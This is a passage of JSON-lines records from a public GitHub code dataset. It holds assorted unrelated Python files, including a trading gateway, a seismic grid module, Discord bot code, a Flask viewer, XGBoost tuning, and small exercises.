self.process_timer_event)\r\n\r\n def connect(self, setting: dict) -> None:\r\n self.md.connect(setting)\r\n self.td.connect(setting)\r\n\r\n def close(self) -> None:\r\n self.md.close()\r\n\r\n def subscribe(self, req: SubscribeRequest) -> None:\r\n return self.md.subscribe(req)\r\n\r\n def send_order(self, req: OrderRequest) -> str:\r\n return self.td.send_order(req)\r\n\r\n def cancel_order(self, req: CancelRequest) -> None:\r\n return self.td.cancel_order(req.orderid)\r\n\r\n def query_account(self) -> None:\r\n self.td.query_account()\r\n\r\n def query_position(self) -> None:\r\n self.td.query_position()\r\n\r\n def query_order(self):\r\n self.td.query_order()\r\n\r\n def query_trade(self):\r\n self.td.query_trade()\r\n\r\n def on_contract(self, contract):\r\n self.contracts[contract.vt_symbol] = contract\r\n super(QmtGateway, self).on_contract(contract)\r\n\r\n def get_contract(self, vt_symbol):\r\n return self.contracts.get(vt_symbol)\r\n\r\n def process_timer_event(self, event) -> None:\r\n if not self.td.inited:\r\n return\r\n if self.count == -1:\r\n self.query_trade()\r\n self.count += 1\r\n if self.count < 21:\r\n return\r\n self.query_account()\r\n self.query_position()\r\n self.query_order()\r\n self.count = 0\r\n\r\n def write_log(self, msg):\r\n super(QmtGateway, self).write_log(f\"[QMT] {msg}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n qmt = QmtGateway(None)\r\n qmt.subscribe(SubscribeRequest(symbol='000001', exchange=Exchange.SZSE))\r\n qmt.md.get_contract()\r\n\r\n import threading\r\n import time\r\n\r\n def slp():\r\n while True:\r\n time.sleep(0.1)\r\n t = threading.Thread(target=slp)\r\n t.start()\r\n t.join()","repo_name":"ruyisee/vnpy_qmt","sub_path":"vnpy_qmt/qmt_gateway.py","file_name":"qmt_gateway.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"75115184487","text":"from builtins import range\nimport math\nimport numpy as num\nfrom pyrocko.guts import Object, Float\nfrom pyrocko import orthodrome as od\n\nfrom silvertine.seiger_lassie import geo\n\nguts_prefix = 'seiger_lassie'\n\n\nclass Grid(Object):\n pass\n\n\nclass Carthesian3DGrid(Grid):\n lat = Float.T(default=0.0)\n lon = Float.T(default=0.0)\n xmin = Float.T()\n xmax = Float.T()\n ymin = Float.T()\n ymax = Float.T()\n zmin = Float.T()\n zmax = Float.T()\n dx = Float.T()\n dy = Float.T()\n dz = Float.T()\n\n def __init__(self, **kwargs):\n for k in kwargs.keys():\n kwargs[k] = float(kwargs[k])\n\n Grid.__init__(self, **kwargs)\n self.update()\n\n def size(self):\n nx, ny, nz = self._shape()\n return nx * ny * nz\n\n def max_delta(self):\n return max(self.dx, self.dy, self.dz)\n\n def update(self):\n self._coords = None\n\n def _shape(self):\n nx = int(round(((self.xmax - self.xmin) / self.dx))) + 1\n ny = int(round(((self.ymax - self.ymin) / self.dy))) + 1\n nz = int(round(((self.zmax - self.zmin) / self.dz))) + 1\n return nx, ny, nz\n\n def _get_coords(self):\n if self._coords is None:\n nx, ny, nz = self._shape()\n x = num.linspace(self.xmin, self.xmax, nx)\n y = num.linspace(self.ymin, self.ymax, ny)\n z = num.linspace(self.zmin, self.zmax, nz)\n self._coords = x, y, z\n\n return self._coords\n\n def depths(self):\n nx, ny, _ = self._shape()\n _, _, z = self._get_coords()\n return num.repeat(z, nx*ny)\n\n def index_to_location(self, i):\n nx, ny, nz = self._shape()\n iz, iy, ix = num.unravel_index(i, (nz, ny, nx))\n x, y, z = self._get_coords()\n return self.lat, self.lon, x[ix], y[iy], 
z[iz]\n\n def lateral_distances(self, receivers):\n nx, ny, nz = self._shape()\n x, y, z = self._get_coords()\n\n rx, ry = geo.points_coords(\n receivers, system=('ne', self.lat, self.lon))\n\n na = num.newaxis\n\n nr = len(receivers)\n\n distances = num.sqrt(\n (x[na, na, :, na] - rx[na, na, na, :])**2 +\n (y[na, :, na, na] - ry[na, na, na, :])**2).reshape((nx*ny*nr))\n\n return num.tile(distances, nz).reshape((nx*ny*nz, nr))\n\n def distances(self, receivers):\n nx, ny, nz = self._shape()\n x, y, z = self._get_coords()\n\n rx, ry = geo.points_coords(\n receivers, system=('ne', self.lat, self.lon))\n\n rz = num.array([r.z for r in receivers], dtype=num.float)\n\n na = num.newaxis\n\n nr = len(receivers)\n\n distances = num.sqrt(\n (x[na, na, :, na] - rx[na, na, na, :])**2 +\n (y[na, :, na, na] - ry[na, na, na, :])**2 +\n (z[:, na, na, na] - rz[na, na, na, :])**2).reshape((nx*ny*nz, nr))\n\n return distances\n\n def distance_max(self):\n return math.sqrt(\n (self.xmax - self.xmin)**2 +\n (self.ymax - self.ymin)**2 +\n (self.zmax - self.zmin)**2)\n\n def surface_points(self, system='latlon'):\n x, y, z = self._get_coords()\n xs = num.tile(x, y.size)\n ys = num.repeat(y, x.size)\n if system == 'latlon':\n return od.ne_to_latlon(self.lat, self.lon, xs, ys)\n elif system[0] == 'ne':\n lat0, lon0 = system[1:]\n if lat0 == self.lat and lon0 == self.lon:\n return xs, ys\n else:\n elats, elons = od.ne_to_latlon(self.lat, self.lon, xs, ys)\n return od.latlon_to_ne_numpy(lat0, lon0, elats, elons)\n\n def plot_points(self, axes, system='latlon'):\n x, y = self.surface_points(system=system)\n axes.plot(y, x, '.', color='black', ms=1.0)\n\n def plot(\n self, axes, a,\n amin=None,\n amax=None,\n z_slice=None,\n cmap=None,\n system='latlon',\n shading='gouraud',\n units=1.,\n artists=[]):\n\n if system == 'latlon':\n assert False, 'not implemented yet'\n\n if not (system[1] == self.lat and system[2] == self.lon):\n assert False, 'not implemented yet'\n\n nx, ny, nz = self._shape()\n x, y, z = self._get_coords()\n\n a3d = a.reshape((nz, ny, nx))\n\n if z_slice is not None:\n iz = num.argmin(num.abs(z-z_slice))\n a2d = a3d[iz, :, :]\n else:\n a2d = num.max(a3d, axis=0)\n\n if artists:\n if shading == 'gouraud':\n artists[0].set_array(a2d.T.ravel())\n elif shading == 'flat':\n artists[0].set_array(a2d.T[:-1, :-1].ravel())\n else:\n assert False, 'unknown shading option'\n\n return artists\n\n else:\n return [\n axes.pcolormesh(\n y/units, x/units, a2d.T,\n vmin=amin, vmax=amax, cmap=cmap, shading=shading)]\n\n\ndef geometrical_normalization(grid, receivers):\n distances = grid.distances(receivers)\n\n delta_grid = grid.max_delta()\n\n delta_ring = delta_grid * 3.0\n ngridpoints, nstations = distances.shape\n norm_map = num.zeros(ngridpoints)\n\n for istation in range(nstations):\n dists_station = distances[:, istation]\n\n dist_min = num.floor(num.min(dists_station) / delta_ring) * delta_ring\n dist_max = num.ceil(num.max(dists_station) / delta_ring) * delta_ring\n\n dist = dist_min\n while dist < dist_max:\n indices = num.where(num.logical_and(\n dist <= dists_station,\n dists_station < dist + delta_ring))[0]\n\n nexpect = math.pi * ((dist + delta_ring)**2 - dist**2) /\\\n delta_grid**2\n\n # nexpect = math.pi * ((dist + delta_ring)**3 - dist**3) /\\\n # delta_grid**3\n\n norm_map[indices] += indices.size / nexpect\n\n dist += delta_ring\n\n norm_map /= nstations\n\n return norm_map\n\n\n__all__ = [\n 'Grid',\n 
'Carthesian3DGrid',\n]\n","repo_name":"braunfuss/silvertine","sub_path":"src/seiger_lassie/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15850124190","text":"from datetime import datetime, timedelta\r\nfrom random import choice\r\nimport apscheduler\r\nimport asyncio\r\nfrom discord import Embed\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Cog\r\nfrom discord.ext.commands import command, has_permissions\r\nimport discord\r\n\r\nnumbers = (\"1️⃣\", \"2️⃣\", \"3️⃣\", \"4️⃣\", \"5️⃣\", \"6️⃣\", \"7️⃣\", \"8️⃣\", \"9️⃣\", \"🔟\")\r\n\r\nclass Poll(commands.Cog, name ='poll+', description ='Make a poll for people in chat to react to. Has a maximum of 10 options and provides a summary after a set time'):\r\n#Make a poll for people in chat to react to. The number of reactions is customizable up to a max of 10 and the duration of the poll can be set in the main command\r\n\tdef __init__(self, client):\r\n\t\tself.client = client\r\n\t\tself.polls = []\r\n\r\n\t@commands.command(name=\"createpoll\", aliases=[\"poll\"])\r\n\tasync def create_poll(self, ctx, seconds: int, question: str, *options):\r\n\t\tif len(options) > 10:\r\n\t\t\tawait ctx.send(\"Max 10 options.\")\r\n\t\t\treturn  # bail out early; otherwise the embed below would be used without ever being built\r\n\t\telse:#create the poll\r\n\t\t\tembed = Embed(title=\"Poll\", description=question, colour=self.client.MAINCOLOUR, timestamp=datetime.utcnow())\r\n\t\t\tfields = [(\"Options\", \"\\n\".join([f\"{numbers[idx]} {option}\" for idx, option in enumerate(options)]), False)]\r\n\t\t\tembed.set_footer(text ='React to cast a vote!')\r\n\t\tfor name, value, inline in fields:\r\n\t\t\tembed.add_field(name=name, value=value, inline=inline)\r\n\t\tmessage = await ctx.send(embed=embed)\r\n\t\tfor emoji in numbers[:len(options)]:\r\n\t\t\tawait message.add_reaction(emoji)\r\n\t\tself.polls.append((message.channel.id, message.id))\r\n\r\n\t\tawait asyncio.sleep(seconds)\r\n\t\t#Get the message then count and sort the votes\r\n\t\tmsg = await message.channel.fetch_message(message.id)\r\n\t\tvotes = msg.reactions\r\n\t\tmost_voted = max(votes, key=lambda r: r.count)\r\n\t\tvotes.remove(most_voted)\r\n\t\tsecond_most_voted = max(votes, key=lambda r: r.count)\r\n\t\t#Send an embed with the results\r\n\t\tif most_voted.count != second_most_voted.count:\r\n\r\n\t\t\twin_embed = discord.Embed(title = 'Vote result', description = f'{most_voted.emoji} {options[numbers.index(most_voted.emoji)]}\\n\\u200b', colour = self.client.MAINCOLOUR)\r\n\t\t\twin_embed.set_footer(text=f'Question: {question}')\r\n\t\t\tawait ctx.send(embed = win_embed)\r\n\r\n\t\telse:\r\n\t\t\ttie_embed = discord.Embed(title = 'Vote result', description = f\"It's a tie!\\n\\u200b\", colour = self.client.MAINCOLOUR)\r\n\t\t\ttie_embed.set_footer(text=f'Question: {question}')\r\n\t\t\tawait ctx.send(embed = tie_embed)\r\n\r\n\t\tself.polls.remove((message.channel.id, message.id))\r\n\r\n\t@create_poll.error\r\n\t#standard error embed message triggered when an error occurs\r\n\tasync def create_poll_error(self, ctx, error):\r\n\t\tif isinstance(error, commands.MissingRequiredArgument):\r\n\t\t\terror_embed = discord.Embed(title = 'Invalid input', description = f'Ensure the format is\\n`{ctx.prefix}poll FOUND'.format(answer_url)\n    if answer_type:\n        if not short:\n            short_str = 'N/A'\n        if not long:\n            long_str = 'N/A'\n        if answer_type == 'rich_set' or answer_type == 'rich_list':\n            list = ast.literal_eval(long)\n            list_type = 'ul' if 
answer_type == 'rich_list' else 'ul'\n long_str = '<{0}>{1}</{0}>'.format(\n list_type,\n ''.join(['<li>{0}</li>'.format(escape(x)) for x in list]))\n \n results_html = ''\n cur.execute('''\n SELECT\n text, url\n FROM queries AS q\n JOIN search_results AS r ON q.id = r.question_id\n WHERE q.id = %s\n ORDER BY r.position ASC;''', [id])\n for text, url in cur.fetchall():\n results_html += '<li><a href=\"{0}\">{1}</a></li>'.format(url, text)\n if results_html:\n results_html = '<ul>{0}</ul>'.format(results_html)\n else:\n results_html = 'Not extracted yet'\n\n return '''\n <html>\n <body>\n {2}\n <h1>{0}</h1>\n <table>\n <tr><td>Answer Type</td><td>{5}</td></tr>\n <tr><td>Short answer</td><td>{3}</td></tr>\n <tr><td>Long answer</td><td>{4}</td></tr>\n <tr><td>Answer URL: {6}</td></tr>\n </table>\n <h2>Results:</h2>\n {7}\n {1}\n </body>\n </html>\n '''.format(question, html, search_form(id), short_str, long_str, answer_type_str, answer_url_str,\n results_html)\n\n@app.route('/search')\ndef show_search():\n query = request.args.get('query')\n cur.execute(\n 'SELECT id, question FROM queries WHERE html IS NOT NULL AND STRPOS(question, %s) > 0 LIMIT 500;', \n [query])\n results_str = ''\n for id, question in cur.fetchall():\n results_str += '<li><a href=\"/question/{0}\">{1}</a></li>'.format(id, question)\n return '''\n <html>\n <body>\n {2}\n <p>Scraped questions that have \"{0}\" as a substring:</p>\n <ul>\n {1}
 </ul>\n </body>\n </html>\n '''.format(query, results_str, search_form(query=query))\n","repo_name":"CogComp/should-X","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43174396367","text":"import os\r\nfrom discord.ext import commands\r\nfrom loguru import logger\r\nimport json\r\n\r\nwith open(\"data/database.json\", \"r\") as f:\r\n data = json.load(f)\r\n \r\ntoken = data[\"token\"]\r\nclient = commands.Bot(command_prefix='b.')\r\nclient.remove_command('help')\r\n\r\n\r\ndef load_cogs():\r\n for file in os.listdir(\"cogs\"):\r\n if file.endswith(\".py\"):\r\n name = file[:-3]\r\n try:\r\n client.load_extension(f\"cogs.{name}\")\r\n logger.info(f\"Loaded cogs.{name}\")\r\n except Exception as e:\r\n logger.error(f\"Couldn't load cog: {name}.\")\r\n logger.exception(e)\r\n\r\n\r\nload_cogs()\r\nclient.run(token)\r\n","repo_name":"amymainyc/build-bot-public","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70728536487","text":"import pandas as pd\nimport xgboost as xgb\n\n# Load the created pickle file \ndata = pd.read_pickle('data.pkl')\n\n# Creating train, validation and test datasets\n# Train\nX_train = data[data.date_block_num < 34].drop(['item_cnt_month'], axis=1)\nY_train = data[data.date_block_num < 34]['item_cnt_month']\n# Validation\nX_valid = data[data.date_block_num == 33].drop(['item_cnt_month'], axis=1)\nY_valid = data[data.date_block_num == 33]['item_cnt_month']\n# Test\nX_test = data[data.date_block_num == 34].drop(['item_cnt_month'], axis=1)\n\n# Loading this data into DMatrices\ndtrain = xgb.DMatrix(X_train, label=Y_train)\ndval = xgb.DMatrix(X_valid, label=Y_valid)\n\n# Initialize parameters for the XGBoost Model \n# Range of values hinted by the discussion boards\n\nparams = {\n # Parameters that we are going to tune.\n 'max_depth':10,\n 'min_child_weight': 300,\n 'eta':0.1,\n 'subsample': 0.6,\n 'colsample_bytree': 0.5,\n # Other parameters\n 'objective':'reg:linear',\n 'eval_metric' : 'rmse' # XGBoost's regression metric is 'rmse'; 'mse' is not a valid option\n}\n\n# Number of boosting rounds\nnum_boost_round = 900\n\n# The model \nmodel = xgb.train(\n params,\n dtrain,\n num_boost_round=num_boost_round,\n evals=[(dval, \"Validation\")],\n early_stopping_rounds=10\n)\n\n# Tuning the hyperparameter max_depth and min_child_weight \n# Max depth is the depth of the constructed tree, deep trees are more complex and may tend to overfit\n# Min_child_weight is the minimum weight required in order to create a new node in the tree. Small min_child_weight \n# creates children with fewer samples and complex trees that may overfit\n\n# Define the range of the grid search parameters - max_depth and min_child_weight \n\ngridsearch_params = [(max_depth,min_child_weight) for max_depth in range(9,12) for min_child_weight in range(250,310,10)]\n\n# Run cross validation on the parameters\nmin_rmse = float(\"Inf\")\nbest_params = None\nfor max_depth, min_child_weight in gridsearch_params:\n print(\"CV with max_depth={}, min_child_weight={}\".format(\n max_depth,\n min_child_weight))\n # Update parameters\n params['max_depth'] = max_depth\n params['min_child_weight'] = min_child_weight\n \n # Run CV\n cv_results = xgb.cv(\n params,\n dtrain,\n num_boost_round=num_boost_round,\n seed=42,\n nfold=5,\n metrics={'rmse'},\n early_stopping_rounds=10\n )\n \n # Update best RMSE\n mean_rmse = cv_results['test-rmse-mean'].min()\n boost_rounds = cv_results['test-rmse-mean'].argmin()\n print(\"\\tRMSE {} for {} rounds\".format(mean_rmse, boost_rounds))\n if mean_rmse < min_rmse:\n min_rmse = mean_rmse\n best_params = (max_depth,min_child_weight)\n \nprint(\"Best params: {}, {}, RMSE: {}\".format(best_params[0], best_params[1], min_rmse))\n# The best parameter values for max_depth and min_child_weight were 10 and 300 respectively\n\n# Tune parameters subsample and colsample_bytree \n# Subsample : number of rows to sample from the dataset. By default the value is set to one, indicating that all rows will be used\n# Colsample_bytree : number of features to sample from dataset. Default value = 1, indicating that all columns will be used\n\n# Define gridsearch parameters\ngridsearch_params = [\n (subsample, colsample)\n for subsample in [i/10. for i in range(7,11)]\n for colsample in [i/10. for i in range(7,11)]\n]\n\nmin_rmse = float(\"Inf\")\nbest_params = None\n# We start from the largest values and go down to the smallest\nfor subsample, colsample in reversed(gridsearch_params):\n print(\"CV with subsample={}, colsample={}\".format(\n subsample,\n colsample))\n # We update our parameters\n params['subsample'] = subsample\n params['colsample_bytree'] = colsample\n # Run CV\n cv_results = xgb.cv(\n params,\n dtrain,\n num_boost_round=num_boost_round,\n seed=42,\n nfold=5,\n metrics={'rmse'},\n early_stopping_rounds=10\n )\n # Update best score\n mean_rmse = cv_results['test-rmse-mean'].min()\n boost_rounds = cv_results['test-rmse-mean'].argmin()\n print(\"\\tRMSE {} for {} rounds\".format(mean_rmse, boost_rounds))\n if mean_rmse < min_rmse:\n min_rmse = mean_rmse\n best_params = (subsample,colsample)\nprint(\"Best params: {}, {}, RMSE: {}\".format(best_params[0], best_params[1], min_rmse))\n\n# The best parameter values for subsample and colsample were both 0.8. \n# These tuned parameters are used in the construction of the final XGBoost model. 
\n","repo_name":"ey4172/Forecasting-Future-Sales","sub_path":"hyperparameter_tuning_xgboost.py","file_name":"hyperparameter_tuning_xgboost.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32065925743","text":"import scrapy\nimport datetime\n\n\n\n\nclass MySpider1Spider(scrapy.Spider):\n date = input(\"Your date in the format yyyy-mm-dd: \")\n correct_date = None\n date_datetime_format = None\n try:\n date_datetime_format = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n day_start = date_datetime_format.day\n month_start = date_datetime_format.month\n year_start = date_datetime_format.year\n correct_date = True\n except:\n print(\"Invalid date\")\n\n\n name = 'my_spider_1'\n allowed_domains = ['https://www.vikka.ua']\n start_urls = ['https://www.vikka.ua/category/novini/']\n\n def parse(self, response):\n date = response.xpath(\"//span[@class='post-info-style']/text()\").extract()\n title = response.xpath(\"//h1[@class='post-title -margin-b']/text()\").extract()\n news_text = response.xpath(\"//div[@class='entry-content -margin-b']//p/text()\").extract()\n tags = response.xpath(\"//a[@class='post-tag']/text()\").extract()\n #news_url = response.xpath(\"\")\n\n #for item in zip(title, news_text, news_url):\n # data_dict = {\n # \"title\" : item[0],\n # \"news_text\" : item[1],\n # \"news_url\" : item[2]\n # }\n # yield data_dict\n\n\n\n\n\n\n\n","repo_name":"Marsianin007/HT_15_git","sub_path":"HT_15/scraper_1/scraper_1/spiders/my_spider_1.py","file_name":"my_spider_1.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24435423322","text":"import logging\nimport pprint\n\nfrom ...db.setting import session\nfrom ...db.search_keywords import SearchKeyword\nfrom ...util.anime_cour import Cours\n\nlogger = logging.getLogger(__name__)\n\nclass SearchKeywordsTaker:\n def take_search_keywords(self, anime):\n try:\n records = session.query(SearchKeyword) \\\n .filter(SearchKeyword.anime_id == anime.row_id) \\\n .all()\n logger.debug(pprint.pformat(records))\n return records\n except:\n logger.exception(\"Taking search keywords failed.\")\n raise\n\n","repo_name":"U0326/anigiri-crawler","sub_path":"src/module/twitter/search/search_keywords_taker.py","file_name":"search_keywords_taker.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70859717929","text":"import json\nimport re\nfrom keyword import kwlist\nfrom typing import Any\n\n\ndef get_type_from_reference(str_ref, convert_to_camel_case=True) -> str:\n pattern = r\".*/(.*)\"\n match = re.search(pattern, str_ref)\n ref_type = match[1] if match else str_ref\n if convert_to_camel_case:\n return snake_case_to_camel_case(ref_type)\n return ref_type\n\n\ndef get_annotation_type(item: dict) -> Any:\n if item.get(\"type\") == \"array\":\n if item[\"items\"].get(\"type\"):\n type_anno = [item[\"items\"][\"type\"]]\n else:\n type_anno = item[\"items\"].get(\"$ref\")\n type_anno = [get_type_from_reference(type_anno)]\n elif item.get(\"type\") and not item.get(\"$ref\"):\n type_anno = item.get(\"type\")\n elif item.get(\"oneOf\"):\n type_anno = [get_annotation_type(item) for item in item[\"oneOf\"]]\n else:\n type_anno = item.get(\"$ref\")\n type_anno = get_type_from_reference(type_anno)\n return type_anno\n\n\ndef get_json_dict(path: str) -> dict:\n 
with open(path, \"r\") as f:\n return json.loads(f.read())\n\n\ndef snake_case_to_camel_case(string: str) -> str:\n return \"\".join(word[0].upper() + word[1:] for word in string.split(\"_\"))\n\n\nCAMEL_CASE_PATTERN = re.compile(r\"((?<=[a-z])[A-Z]|(?<!\\A)[A-Z](?=[a-z]))\")\n\n\ndef camel_case_to_snake_case(string: str) -> str:\n return CAMEL_CASE_PATTERN.sub(r\"_\\1\", string).lower()\n\n\ndef convert_to_python_type(field):\n if field.lower() == \"array\":\n return \"list\"\n elif field.lower() == \"boolean\":\n return \"bool\"\n elif field.lower() == \"integer\":\n return \"int\"\n elif field.lower() == \"number\":\n return \"float\"\n elif field.lower() == \"object\":\n return \"typing.Any\"\n elif field.lower() == \"string\":\n return \"str\"\n else:\n return str(field)\n\n\ndef shift_json_dict_names(plain_data: dict, classnames: dict) -> dict:\n return {v: plain_data[k] for k, v in classnames.items()}\n\n\ndef categorize_methods_as_files(json_dict: dict) -> dict:\n filenames = set()\n for method_dict in json_dict[\"methods\"]:\n method_name = method_dict[\"name\"].split(\".\")[0]\n filenames.add(method_name)\n\n return {name: {} for name in filenames}\n\n\ndef resolve_property_name(name: str):\n if name[0].isdigit() or name in kwlist:\n name = f\"_{name}\"\n return name\n","repo_name":"tososomaru/vk_schema_codegen","sub_path":"utils/strings_util.py","file_name":"strings_util.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12579944988","text":"filename = \"C:\\\\Users\\\\USER\\\\Desktop\\\\Python_Skillshare_Code_Repo\\\\files\\\\movies_line_by_line.txt\"\nwith open(filename) as file_object:\n lines = file_object.readlines()\n \"\"\"readlines() takes each line from the file and stores\n them in a list\"\"\" \n\nfor line in lines:\n print(line.strip())\n \"\"\"The above loop prints each item from the list\"\"\"\n\nprint(type(lines))","repo_name":"JafarSadikGhub/Python_Skillshare_Practice_Code","sub_path":"sx7_making_a_list_from_a_file.py","file_name":"sx7_making_a_list_from_a_file.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9779426445","text":"import json\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom workspace.techsupport.jobs import (\n out_of_office_off,\n out_of_office_on,\n out_of_office_status,\n)\n\n\n@pytest.fixture\ndef config_path(tmp_path):\n yield tmp_path / \"test_ooo.json\"\n\n\n@pytest.mark.parametrize(\n \"config,message\",\n [\n (None, \"Tech support out of office OFF\"), # OOO not on\n (\n {\"start\": \"2022-01-01\", \"end\": \"3033-01-01\"}, # OOO on\n \"Tech support out of office OFF\",\n ),\n (\n {\"start\": \"3033-01-01\", \"end\": \"3033-01-01\"}, # OOO scheduled\n \"Scheduled tech support out of office cancelled\",\n ),\n ],\n)\ndef test_out_of_office_off(config_path, config, message):\n if config is not None:\n with open(config_path, \"w\") as f_out:\n json.dump(config, f_out)\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_off() == message\n\n\n@pytest.mark.parametrize(\n \"config,message\",\n [\n (None, \"Tech support out of office is currently OFF.\"), # OOO not on\n (\n {\"start\": \"2000-01-01\", \"end\": \"2001-01-01\"}, # OOO past\n \"Tech support out of office is currently OFF.\",\n ),\n (\n {\"start\": \"2022-01-01\", \"end\": \"3033-01-01\"}, # OOO on\n \"Tech support out of office is currently ON until 3033-01-01.\",\n ),\n (\n 
{\"start\": \"3033-01-01\", \"end\": \"3033-01-01\"}, # OOO scheduled\n \"Tech support out of office is currently OFF.\\n\"\n \"Scheduled out of office is from 3033-01-01 until 3033-01-01.\",\n ),\n ],\n)\ndef test_out_of_office_status(config_path, config, message):\n if config is not None:\n with open(config_path, \"w\") as f_out:\n json.dump(config, f_out)\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_status() == message\n\n\n@pytest.mark.parametrize(\n \"start,end,message\",\n [\n (\n \"2020-12-01\",\n \"3033-12-01\",\n \"Tech support out of office now ON until 3033-12-01\",\n ),\n (\n \"3033-12-01\",\n \"3034-12-01\",\n \"Tech support out of office scheduled from 3033-12-01 until 3034-12-01\",\n ),\n ],\n)\ndef test_out_of_office_on(config_path, start, end, message):\n assert not config_path.exists()\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_on(start, end) == message\n assert config_path.exists()\n with open(config_path, \"r\") as f_in:\n config = json.load(f_in)\n assert config == {\"start\": start, \"end\": end}\n\n\n@pytest.mark.parametrize(\n \"start,end,message\",\n [\n # trying to set OOO in the past\n (\"2020-12-01\", \"2020-12-02\", \"Error: Can't set out of office in the past\"),\n # start date after end date\n (\"3033-12-01\", \"3033-11-01\", \"Error: start date must be before end date\"),\n ],\n)\ndef test_out_of_office_on_errors(config_path, start, end, message):\n assert not config_path.exists()\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n assert out_of_office_on(start, end) == message\n assert not config_path.exists()\n\n\n@pytest.mark.parametrize(\n \"start,end\",\n [\n (\"2020-02-30\", \"2020-12-02\"), # bad start\n (\"3033-12-01\", \"3033-13-01\"), # bad end\n ],\n)\ndef test_out_of_office_on_invalid_dates(config_path, start, end):\n assert not config_path.exists()\n with patch(\"workspace.techsupport.jobs.config_file\", return_value=config_path):\n with pytest.raises(ValueError):\n out_of_office_on(start, end)\n assert not config_path.exists()\n","repo_name":"ebmdatalab/ebmbot","sub_path":"tests/test_tech_support_out_of_office.py","file_name":"test_tech_support_out_of_office.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13316418570","text":"paths = {}\nfull_paths = []\nwith open(\"input.txt\", \"r\") as f:\n for line in f:\n src, dst = line.strip().split('-')\n if src in paths:\n paths[src].append(dst)\n else:\n paths[src] = [dst]\n if dst in paths:\n paths[dst].append(src)\n else:\n paths[dst] = [src]\n\n\ndef visited_two_small(visited):\n for visited_node in visited:\n if (visited_node == visited_node.lower()) and (len([x for x in visited if x == visited_node]) > 1):\n return True\n return False\n\n\ndef visit(node, visited):\n visited.append(node)\n for dst in paths[node]:\n if dst == 'end':\n final_path = visited.copy()\n full_paths.append(final_path.append(dst))\n elif (dst == dst.upper()) or (dst not in visited) or ((not visited_two_small(visited)) and (dst != 'start')):\n visit(dst, visited.copy())\n\n\nvisit('start', [])\nprint(len(full_paths))\n","repo_name":"n-parisi/advent-of-code-2021","sub_path":"pkg/12/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"38733787448","text":"# Create Note (Notatka) and Notebook (Notatnik) classes. The Note class stores the author, the content and the creation time\n# (the author and the content are passed as constructor arguments, and the time is captured and stored when the object is created).\n# The Notebook constructor takes no arguments; instead it creates an empty list to which Note\n# objects will be added. The Notebook class must implement methods that allow you to: add a new note, add an existing\n# note, check how many notes have been added, and display all added notes.\n# Additionally, the case of an empty notebook must be handled.\n# Hint:\n# time can be represented with the\n# datetime module\n# Documentation of the\n# datetime module\n# https://docs.python.org/3/library/datetime.html\nimport datetime\n\n\nclass Notebook:\n def __init__(self):\n self.notes = {}\n self.menu()\n\n def menu(self):\n run = True\n while run:\n choice = int(input('What do you want to do? 1 - add a note, 2 - delete a note, 3 - check the number of notes,'\n ' 4 - display all notes, 5 - quit the program: '))\n\n if choice == 1:\n self.add_note()\n if choice == 2:\n self.delete_note()\n if choice == 3:\n self.check_length()\n if choice == 4:\n self.show_notes()\n if choice == 5:\n run = False\n\n def add_note(self):\n author = input('who is the author: ')\n content = input('content: ')\n note_id = int(input('Enter an id:'))\n new_note = Note(author, content, note_id)\n self.notes.update({note_id: new_note})\n\n def delete_note(self):\n if len(self.notes):\n print(self.notes)\n which = int(input('which note do you want to delete, enter its id: '))\n self.notes.pop(which)\n\n def check_length(self):\n print(f'number of notes: {len(self.notes)}')\n\n def show_notes(self):\n print('Your notes: ')\n for i in self.notes.items():\n print(i)\n\n\nclass Note:\n def __init__(self, author, content, note_id):\n self.author = author\n self.content = content\n self.time = datetime.datetime.now()\n self.note_id = note_id\n\n def __repr__(self):\n return f'author: {self.author}, note: {self.content}, added at: {self.time}'\n\n\nNotebook()","repo_name":"KDebowiec/DevsMentoring","sub_path":"rozszerzenie/klasy/klasy7.py","file_name":"klasy7.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72309711849","text":"from pybrain.structure import FeedForwardNetwork\nfrom pybrain.structure import LinearLayer, SigmoidLayer\nfrom pybrain.structure import FullConnection\nimport math\n\nclass Prey:\n # initial radius\n init_radius = 20\n def __init__(self, direction, x, y):\n # radius\n self.radius = self.init_radius\n #Neural network\n self.nn = FeedForwardNetwork()\n #Add layers\n inLayer = LinearLayer(8)\n hiddenLayer = 